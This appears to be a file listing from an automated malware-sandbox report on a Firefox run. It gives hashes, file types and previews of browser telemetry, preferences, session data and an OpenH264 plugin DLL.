                                                                                                                                                                                  SHA-256:3E9583676DDB1A5E947E28C5642551914B9106A85DEC051D0B04F13D93355E52
                                                                                                                                                                                  SHA-512:834D2A93F27291AC0510352E0FCCE7D1364E6455B2CDA41C62A6E2F7B4513B66A6C63519017A0C91F71539FECE4B629CDD4238BF2EC2F76AA9CCCD8D2E1C9985
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/messaging-system/1/5e16a81f-1e89-4191-ac33-8ab19a08b66f.{"ping_info":{"seq":10,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","experiments":{"serp-ad-telemetry-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9","type":"nimbus-rollout"}},"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"type":"nimbus-nimbus","enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","windows_build_number":19045,"ap
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (872)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):942
                                                                                                                                                                                  Entropy (8bit):4.992246703524653
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:BGKg7U+8M4uyeAjjMokBpSwZL7GA++nAa:u7UtM4L/jKBpMAnN
                                                                                                                                                                                  MD5:0471E2BE915ED9BB5EFE7223B783BBD2
                                                                                                                                                                                  SHA1:0D2DEAD3BF0074CDF3F2B882C4CCDF73808FDCE6
                                                                                                                                                                                  SHA-256:152569A1855ADA473DCBA0A1215C3B771E083B6EB15F95DA8660C04EB025C3F0
                                                                                                                                                                                  SHA-512:A2B5D593589BAB6B5F218A0297068C07A2D307BF1D4EBCE109E19FDEDB814A8ADC9610FC121BA2E6F32FA1C28525B3DE6738BE2E486A46B18EE5ABF9CC3AA50B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/newtab/1/6f7581f3-9c81-406e-b1d2-b9090ab44db1.{"ping_info":{"seq":6,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","reason":"component_init"},"client_info":{"telemetry_sdk_build":"53.2.0","client_id":"94e496bf-3c7e-4db9-9bf8-122f99be3ca5","os":"Windows","os_version":"10.0","architecture":"x86_64","app_build":"20230927232528","app_channel":"release","app_display_version":"118.0.1","locale":"en-US","build_date":"1970-01-01T00:00:00+00:00","first_run_date":"2023-10-05+02:00","windows_build_number":19045},"metrics":{"boolean":{"newtab.search.enabled":true,"pocket.is_signed_in":false,"pocket.enabled":true,"topsites.enabled":true,"topsites.sponsored_enabled":true,"pocket.sponsored_stories_enabled":true},"string":{"newtab.homepage_category":"enabled","newtab.newtab_category":"enabled","newtab.locale":"en-US"},"string_list":{"newtab.blocked_sponsors":[]},"quantity":{"topsites.rows":1}}}
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1500)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1572
                                                                                                                                                                                  Entropy (8bit):5.026046602851725
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:BGc+U/RJgw+RhvXWLXJ5hJWSj+V+JZiXG8++udUojTAfMoNC8M4OBpBwovS2p8:1+AvOH/WLVYSaG8ZuUogLpM4OBpbK2p8
                                                                                                                                                                                  MD5:F3A37B82A5BFA9F3A132A68B62A02552
                                                                                                                                                                                  SHA1:22B377B1E6BE3E350457E5D179359716EAAD6B38
                                                                                                                                                                                  SHA-256:B9862D7A3719239780154AF7AE75161894C202FC70AC4EA534266D83C0B1CCAD
                                                                                                                                                                                  SHA-512:F8E7441E40B41D33B895CD9775E8FC8460C94CAC6EB82549FE4D3DBE9E332A5838F9138BD7AAEB37A78DAE48518E4F18921631D21C075F19E2CA7C3B9C27ACC6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:/submit/firefox-desktop/baseline/1/967d9d50-f397-49d3-8ec0-e15f2a105ac0.{"ping_info":{"seq":2,"start_time":"2023-10-05T08:20+02:00","end_time":"2024-02-21T13:44+01:00","reason":"active","experiments":{"upgrade-spotlight-rollout":{"branch":"treatment","extra":{"type":"nimbus-rollout","enrollmentId":"cff18e4e-a3e2-450c-a28f-e1824d155e26"}},"serp-ad-telemetry-rollout":{"branch":"control","extra":{"enrollmentId":"e448ac36-35a1-421b-a6e6-dad58fb3f779","type":"nimbus-rollout"}},"csv-import-release-rollout":{"branch":"enable-csv-import","extra":{"type":"nimbus-rollout","enrollmentId":"d4ca3def-aec5-42b2-b1e3-559d67fe58b7"}},"bookmarks-toolbar-default-on":{"branch":"treatment-a","extra":{"enrollmentId":"d48f64a8-a4ab-4cdd-a650-4b386e41a201","type":"nimbus-nimbus"}},"extensions-migration-in-import-wizard-116-rollout":{"branch":"control","extra":{"type":"nimbus-rollout","enrollmentId":"a1fd2837-b63f-4f6a-902c-9c3b1eb0dab9"}}}},"client_info":{"telemetry_sdk_build":"53.2.0","app_build":"2023092723
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):161
                                                                                                                                                                                  Entropy (8bit):4.8857557213705665
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YWAqKskLXccITseYeuJHBMfYgyd8dIJQJA2aqnLJrja/H5C:YWAqfX5I11H6f+mEQOanLFu/ZC
                                                                                                                                                                                  MD5:7F96AC92385790FB23FFE4E438AABEA5
                                                                                                                                                                                  SHA1:425EF2E10194B521AE6DD638D797D0581BFE3C03
                                                                                                                                                                                  SHA-256:AD3E3BEE1AE016AC26285D4C87090C1A077160BFB6F716AF87A2D2AD955ED820
                                                                                                                                                                                  SHA-512:E8DF61BD4FD9F3E6D5143EE0620275B2123D00485AE15D3D5D52199A722EC2E200F4E2ECC769A330224A31C10673D3C119AEF718FD7D966CE384880142699A13
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"sessionId":"8013cf57-3299-4c3c-af20-1d89a1328d5c","subsessionId":"7f0379b0-9df3-4fe1-8b98-3a895a724f81","profileSubsessionCounter":3,"newProfilePingSent":true}
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):36830
                                                                                                                                                                                  Entropy (8bit):5.185052013683835
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:AI4wvfCXh496G4C4U1W4z4xuHhvp4N4Tc4Z4S4t24U:AruBv3
                                                                                                                                                                                  MD5:10E2D85FEF0DB266E519048D63617FA8
                                                                                                                                                                                  SHA1:EBB307C44EBEFFA271AC58FDDE5C3A1BA52AE7B0
                                                                                                                                                                                  SHA-256:92143A48F55639B5BD01385D0E4E78EDED4F84401A91C12AC06251EE188CFE0E
                                                                                                                                                                                  SHA-512:164CBE725B44020AD40D165A1B1C242A7016ED8933AB9502D0D38E6CD99887D9DF49533DE54068AA4E5D8476C7791B52518A8477B8961475B7CB2C3AF54B81B1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{87ef1fa3-cb84-4bbf-a615-45a1d14b629d}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):33288
                                                                                                                                                                                  Entropy (8bit):0.4612989124354543
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:7+tPN6LiOVxExBWrkier5NzW6LlmProNpNmVIpPuVM7rBmxF/EzgF:7MPN6XHMArt0pmcNptpGVM7rBw/vF
                                                                                                                                                                                  MD5:F44A28F22288BFA610C0D1FBACC486FC
                                                                                                                                                                                  SHA1:DFCE3E517E7FB2253F781CD4964789FFB81C9D73
                                                                                                                                                                                  SHA-256:5F10EBD8817D269008BAE2DA40265D7E4D835CD93D85041AF5942CCC69683ADF
                                                                                                                                                                                  SHA-512:0427AE8EF849497C5D92AE3CB73C4C8E02B8076745A1719B4FD7A0FAEBD7FF82592B21CDAC3A2ACFCA88176C42868C453B0B1D5AD47B9218C01C398522C0C946
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1102240
                                                                                                                                                                                  Entropy (8bit):6.6236318014412126
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:bif6DS+hWYEwTkhPcB64VjVEj3cYemypfYIC:bTDSNwToPcfjBmypf6
                                                                                                                                                                                  MD5:842039753BF41FA5E11B3A1383061A87
                                                                                                                                                                                  SHA1:3E8FE1D7B3AD866B06DCA6C7EF1E3C50C406E153
                                                                                                                                                                                  SHA-256:D88DD3BFC4A558BB943F3CAA2E376DA3942E48A7948763BF9A38F707C2CD0C1C
                                                                                                                                                                                  SHA-512:D3320F7AC46327B7B974E74320C4D853E569061CB89CA849CD5D1706330ACA629ABEB4A16435C541900D839F46FF72DFDE04128C450F3E1EE63C025470C19157
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V..V7.V7.V7.9S.C7.9S.[7.9S..7.9S.U7.V7.17.._._7.._.b7.._.H7.V7.87.?_.W7.?_.W7.RichV7.........PE..d.....Jd.........." .................C....................................................`.........................................P7..,...|8..(................I.......)..............T...................`...(...`................................................text.............................. ..`.rodata............................. ..`.rdata..F...........................@..@.data...p3...P.......2..............@....pdata...I.......J...N..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):116
                                                                                                                                                                                  Entropy (8bit):4.920722044218877
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:C3OuN9RAM7VDXcEzq+r2Xl3vTMBv+FdBAIABv+FEn:0BDUm213vAWeWEn
                                                                                                                                                                                  MD5:2A461E9EB87FD1955CEA740A3444EE7A
                                                                                                                                                                                  SHA1:B10755914C713F5A4677494DBE8A686ED458C3C5
                                                                                                                                                                                  SHA-256:4107F76BA1D9424555F4E8EA0ACEF69357DFFF89DFA5F0EC72AA4F2D489B17BC
                                                                                                                                                                                  SHA-512:34F73F7BF69D7674907F190F257516E3956F825E35A2F03D58201A5A630310B45DF393F2B39669F9369D1AC990505A4B6849A0D34E8C136E1402143B6CEDF2D3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 2.3.2.APIs: encode-video[h264], decode-video[h264].
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):66064
                                                                                                                                                                                  Entropy (8bit):0.12276882319696106
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:7+tqQVC+guGBg1f8QEO/Jv6Bl/bAWla0mwPxRymgObsCVR45wcYR4fmnsCVR4j:7+tNs+ABVER6LbUsh7Owd4+M
                                                                                                                                                                                  MD5:7919BAAEC7C90B044C3E867644782735
                                                                                                                                                                                  SHA1:D54688590A120AA9DF2F49BE3B8643E0CA339931
                                                                                                                                                                                  SHA-256:EAC0DAA79073BA71DA68A20759901F985DA357CD9FC6ECC5AAE38FFA2EB3F0BC
                                                                                                                                                                                  SHA-512:CEBE5F16EEFC65B03463C4B7D789A7662F955BC5B5523415AB9DB1533E81A7C9CEDFBDB6898E3F9A35DA8C35CAFB714CEE390681B9E00E4E4287C85BF42AE69C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                  Category:modified
                                                                                                                                                                                  Size (bytes):17070
                                                                                                                                                                                  Entropy (8bit):5.426235242558987
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ynTFTRRUYbBp6wLZNMGaXdm+qU4Knzy+/3/7Wu5RYiNBw8dlxHkgSl:YKe9FNMVtzyCJdwW0
                                                                                                                                                                                  MD5:2AAE4FDB4C6EF138B735DD1726868073
                                                                                                                                                                                  SHA1:4066C3CB21BFBD26B112DA9FD7D61E4BAB0D7415
                                                                                                                                                                                  SHA-256:2EF92B48C6E678DEB881D7D5D3DE16AFD247C225B5C7FA8E2305F9A908B54194
                                                                                                                                                                                  SHA-512:00C546DCBF78A53A143719D8F6ABF161B0114DD2E4A1FB19274938A4C6952E2FEB7CA0B1144E08824A18CC6A3B775B457773A306069B9EB5E55963D99D67F835
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1708519436);..user_pref("app.update.lastUpdateTime.background-update-timer", 1708519436);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1708519436);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.r
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17070
                                                                                                                                                                                  Entropy (8bit):5.426235242558987
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ynTFTRRUYbBp6wLZNMGaXdm+qU4Knzy+/3/7Wu5RYiNBw8dlxHkgSl:YKe9FNMVtzyCJdwW0
                                                                                                                                                                                  MD5:2AAE4FDB4C6EF138B735DD1726868073
                                                                                                                                                                                  SHA1:4066C3CB21BFBD26B112DA9FD7D61E4BAB0D7415
                                                                                                                                                                                  SHA-256:2EF92B48C6E678DEB881D7D5D3DE16AFD247C225B5C7FA8E2305F9A908B54194
                                                                                                                                                                                  SHA-512:00C546DCBF78A53A143719D8F6ABF161B0114DD2E4A1FB19274938A4C6952E2FEB7CA0B1144E08824A18CC6A3B775B457773A306069B9EB5E55963D99D67F835
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1708519436);..user_pref("app.update.lastUpdateTime.background-update-timer", 1708519436);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1708519436);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.r
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):33288
                                                                                                                                                                                  Entropy (8bit):0.08338195131242726
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:7+/lXfgtBl/lquN1P4BEJYqWvLue3FMOrMZ0wI:7+tXf6Bl/ZnjfJiFxMZm
                                                                                                                                                                                  MD5:A9AFF210EBF176BDE047205097B8F0C0
                                                                                                                                                                                  SHA1:2ADAF1C4A754F2992087A74E72AF4E5587597A37
                                                                                                                                                                                  SHA-256:11CDCCA190C9240FC44E739F329D51CC8515B0BDD0974DE016BAF19D0DCD8FD2
                                                                                                                                                                                  SHA-512:0994C0A8B8734688A44963188FF225D7A6AF4960D916DFA9B1061AD95487251CC6AACCDB18C7B49ECC1E6BCFF0BE223BF835A501D1662C5FB9B8C970CC35B944
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):90
                                                                                                                                                                                  Entropy (8bit):4.194538242412464
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
                                                                                                                                                                                  MD5:C4AB2EE59CA41B6D6A6EA911F35BDC00
                                                                                                                                                                                  SHA1:5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
                                                                                                                                                                                  SHA-256:00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
                                                                                                                                                                                  SHA-512:71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Mozilla lz4 compressed data, originally 19410 bytes
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):6252
                                                                                                                                                                                  Entropy (8bit):6.65946569878185
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:FhyMjZWL7hYx7rnluViF0IlMZkcML4rsaSt6zi:Bjsp07seE3sa8L
                                                                                                                                                                                  MD5:63CA9F30BA62777BE4FF5B309BBD91FC
                                                                                                                                                                                  SHA1:706E218DB75103303A68C3E352B1F3F1B42E6560
                                                                                                                                                                                  SHA-256:78BCAB615E67057F06EAD77D84CB6A99EEEBC43B02F984B32B97644C9F584ACE
                                                                                                                                                                                  SHA-512:A8B10A66CA872DE9EEE590F401653AD28EED672B904E5E54EF7585A380568F4BBCC5BFB75944179C895C4DEFE8428573AFEAF422A2400E8D920EEA3163F1B175
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozLz40..K....{"version":["ses....restore",1],"windows":[{"tab..bentrie....url":"https://www.youtube.com/","title#....cacheKey":0,"ID":4,"docshellUU...D"{11e7cea9-5bca-4ef4-99d5-d15ccdbf2a12}","resultPrincipalURI":null,"hasUserInteract....false,"triggering9.p_base64{..\"3\":{}_..6docIdentifier":5,"persist":true}],"lastAccessed":1708519407306,"hiddey..searchMode...userContextId...attributq..{},"index":1...questedI..s0,"imagL./},....accounts.googl....'......5.......8508044b-8b74-4031-8f66-d4fa2a869b35S...referrerInfo":"BBoSnxDOS9qmDeAnom1e0A...w..$EY.....0BAQ..oABAA==..^.6..._31123..x....facebook.._video....)......20....a5f52f7a-55de-42a5-a0f3-bf86fd118a2....../21...?719..V.."chrome://global/skin/icons/warning.svg":...2....0.&......265a797d-c1b5-444b-997e-dbc67fa45e893../22&..?207<.W.&.3.9..pv3/signt..D..?continue=D..%3A%2F%2F@...%2F&followup....ifkv=ATuJsjw9e7PC33_7-svQuQgHqA5CnbF8YAeK-gwghWImJ8owO10ADdpehR33T0NeoeEcxd4BmlVz&passive=1209600&flowName=GlifWebSignIn&flowEntry=ServiceLogin
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Matlab v4 mat-file (little endian) chistory, text, rows 0, columns 2817
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):152
                                                                                                                                                                                  Entropy (8bit):4.253463615841034
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:klJFc/slbKRxrtsLQ9Cl/lRlQRM9WREaD342WeuWsgfeYY:szcxhF8dQsWiA3ztuyHY
                                                                                                                                                                                  MD5:25B33BCBDE336FD8FBE9691DBDCD8518
                                                                                                                                                                                  SHA1:8C00082575CFB1930A9FA057D610E02420A2BD82
                                                                                                                                                                                  SHA-256:5C7749CAA02F42E02108680C7A76024706BE72EF23CD6DDC044CDD4BBDDA1C1E
                                                                                                                                                                                  SHA-512:72F750E8676FD0748E1B45306644F043951CEC14A5AB5A200650D525DB2B83DF37400D614D332A9F984926B7725CE8F0AF2265499D4694C31A01DA00DFBBE2F5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.................synchistory....................v1-settings-sync.1708509430155B........9.......{"timestamp":1708509430155,"status":"success","infos":{}}
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2072
                                                                                                                                                                                  Entropy (8bit):0.4055217869301514
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:7FEG2l8L0X9dlp/FlalTX/lal/QMRgSEBtl/StlVltllJWXXr3v:7+/l5X//mTI/vgvBtlq2Hr3v
                                                                                                                                                                                  MD5:A34D73A2E8017F1C4E385A1021A57B48
                                                                                                                                                                                  SHA1:157D1314D2AD257A5A1CEABC1B626E2DDC10E11D
                                                                                                                                                                                  SHA-256:431B08347768511C512962C73100495A2AC98B6D299B82DB24B53A497AED7F5F
                                                                                                                                                                                  SHA-512:4E1758622176B76097CEA027F7E09D8F54CED1F85C9E1B3FB2E59372A8BD275815259296ED00829F2242ECE92174A1245C3F6752BB67C3A04A7CA9517590A319
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):53
                                                                                                                                                                                  Entropy (8bit):3.546462518443435
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:8oVezYrSLUxGTl:8e9GLUxGp
                                                                                                                                                                                  MD5:DB04B9E39EC847B52BF41A17057B905C
                                                                                                                                                                                  SHA1:C65199559B3194755FA80882D8E19C614484188E
                                                                                                                                                                                  SHA-256:8866D81074C9BBD8523CFEA3064C85C4BD4808B545A04D43DBE0CEDA0CC64423
                                                                                                                                                                                  SHA-512:B238FD3F0FDB12027E5BC945999FA1FA7A99DEB1057AEE4DCBCB7464D680DC03A2ACCA3FC162A2CB5F6CF2AADBD55354A7EE94CD03C6E46EB839C90709054DBD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.....r .....................https://www.youtube.com.
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8
                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                  MD5:7DEA362B3FAC8E00956A4952A3D4F474
                                                                                                                                                                                  SHA1:05FE405753166F125559E7C9AC558654F107C7E9
                                                                                                                                                                                  SHA-256:AF5570F5A1810B7AF78CAF4BC70A660F0DF51E42BAF91D4DE5B2328DE0E83DFC
                                                                                                                                                                                  SHA-512:1B7409CCF0D5A34D3A77EAABFA9FE27427655BE9297127EE9522AA1BF4046D4F945983678169CB1A7348EDCAC47EF0D9E2C924130E5BCC5F0D94937852C42F1B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:........
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                                  Entropy (8bit):0.13951005433287042
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:7FEG2l+uGsll/FllkpMRgSWbNFl/sl+ltlsl8lcWllTcg:7+/lRjg9bNFlEs1E0cI
                                                                                                                                                                                  MD5:462F5B874DB1ADB29AE6D1A4F2F2337B
                                                                                                                                                                                  SHA1:6E4EC70FBE3537543FF5FA1268123492986844EB
                                                                                                                                                                                  SHA-256:ABECA75B1F17BD31B48AF60348878CB60A4DB08328489E3492B9C9B34D32A614
                                                                                                                                                                                  SHA-512:9031975226249667432957C9953735788F23F695DEA296695D935BC717BD0886C193DB8CE9C2D03611BC08743058CAB6E3A8A5DCE512547DC3C5B6D73DA4B7B4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, user version 416, last written using SQLite version 3042000, writer version 2, read version 2, file counter 3, database pages 11, cookie 0xd, schema 4, largest root page 11, UTF-8, vacuum mode 1, version-valid-for 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                  Entropy (8bit):0.7514262610120032
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:T/OA65g7LV6CM5znpgBlizb5pxVgnO9zxV+LU7mY2wzY5QcEVdyET:j16S6CKnqlizbxV+2xVeU7X2B0T
                                                                                                                                                                                  MD5:4C6111BEAC59B77E17F7378B0EA0D8E5
                                                                                                                                                                                  SHA1:45210A2064C1387D4A39FE3356A4ED34C8EC4A83
                                                                                                                                                                                  SHA-256:C3D5BF2FA267C07D4301D82404A5C0E21EC9E79398FE3F15F30999A082B4C0EF
                                                                                                                                                                                  SHA-512:A8F91BA7D9728829A49210F1B7E38735645DB7F909703208EDD8BB44F5BF91DD7655CE1F57C2ED94D3A1DAA2D97888CC72B090978A87EE87CC66A17EDC4321D5
                                                                                                                                                                                  Malicious:false
Preview:SQLite format 3......@ ...j...;...[...-...3....triggerfile_update_triggerfileCREATE TRIGGER file_update_trigger AFTER UPDATE ON file FOR EACH ROW WHEN NEW.refcount = 0 BEGIN DELETE FROM file WHERE id = OLD.id; END.Y...A#..Ytriggerobject_data_delete
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                                  Entropy (8bit):0.13949598770239585
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:7FEG2l+5ll9llntFllkpMRgSWbNFl/sl+ltlsl8lcWll5n:7+/lklvlBg9bNFlEs1E0ccn
                                                                                                                                                                                  MD5:F13DD9EEE9BE739F39C1F4354641D047
                                                                                                                                                                                  SHA1:25B7F8B339811AC24BE33855A0DBC45C19E1E2B1
                                                                                                                                                                                  SHA-256:4E07B9018EBAE8E10EA69A05DCA6ABA29912B67949882E2FC5B24B999F51FCB9
                                                                                                                                                                                  SHA-512:498F6512164D1D4FED199A71411765FABD3785CE1FFCDB90633664F184B852A124BC9833E4041CDA1468BF57B82FE618B8BF90BE582581FE38E4F3269BDDA894
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
